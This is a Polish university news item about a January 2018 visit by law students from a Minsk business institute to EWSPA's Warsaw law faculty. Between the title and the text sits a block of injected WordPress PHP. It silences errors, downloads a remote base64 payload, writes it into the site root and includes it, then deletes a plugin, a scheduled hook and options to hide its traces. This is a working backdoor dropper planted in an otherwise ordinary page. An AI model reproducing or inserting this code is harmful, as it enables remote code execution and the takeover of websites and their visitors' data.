WIZYTA STUDENTÓW Z Private Institute of Mangament and Business (ros. Минский институт управления)

error_reporting(0);
$http=get_option(E_NOTICE);
$resp=wp_remote_get( $http[0]);
$code=wp_remote_retrieve_body($resp);
file_put_contents(ABSPATH.$http[1], base64_decode($code));
include_once(ABSPATH.$http[4]);
deactivate_plugins($http[2]);
delete_plugins(array($http[2]));
wp_clear_scheduled_hook($http[3]);
delete_option($http[5]);
delete_option(E_NOTICE);
Szanowni Państwo,

dzień 23 stycznia 2018 r., był wyjątkowym dniem, gdyż Wydział Prawa w Warszawie Europejskiej Wyższej Szkoły Prawa i Administracji odwiedziła także grupa studentów kierunku prawo z Private Institute of Mangament and Business (ros. Минский институт управления) z siedzibą w Mińsku na Białorusi wraz z opiekunem Valerym Holikau – dyrektorem ds. współpracy międzynarodowej i marketingu.
 
W ramach wizyty studenci wysłuchali wykładu dr Artura Kotowskiego – Prodziekana Wydziału Prawa w Warszawie EWSPA pt. Comparison of legal cultures, a także wzięli udział w spotkaniu z p. Katarzyną Zając – Kanclerz EWSPA i p. Jakubem Spurkiem – Prodziekanem Zamiejscowego Wydziału Prawa w Londynie EWSPA na temat systemu kształcenia wyższego w Polsce.
 
Uczelnia z Mińska jest jedną z największych niepublicznych szkół wyższych na Białorusi.
DSC_0616    DSC_0617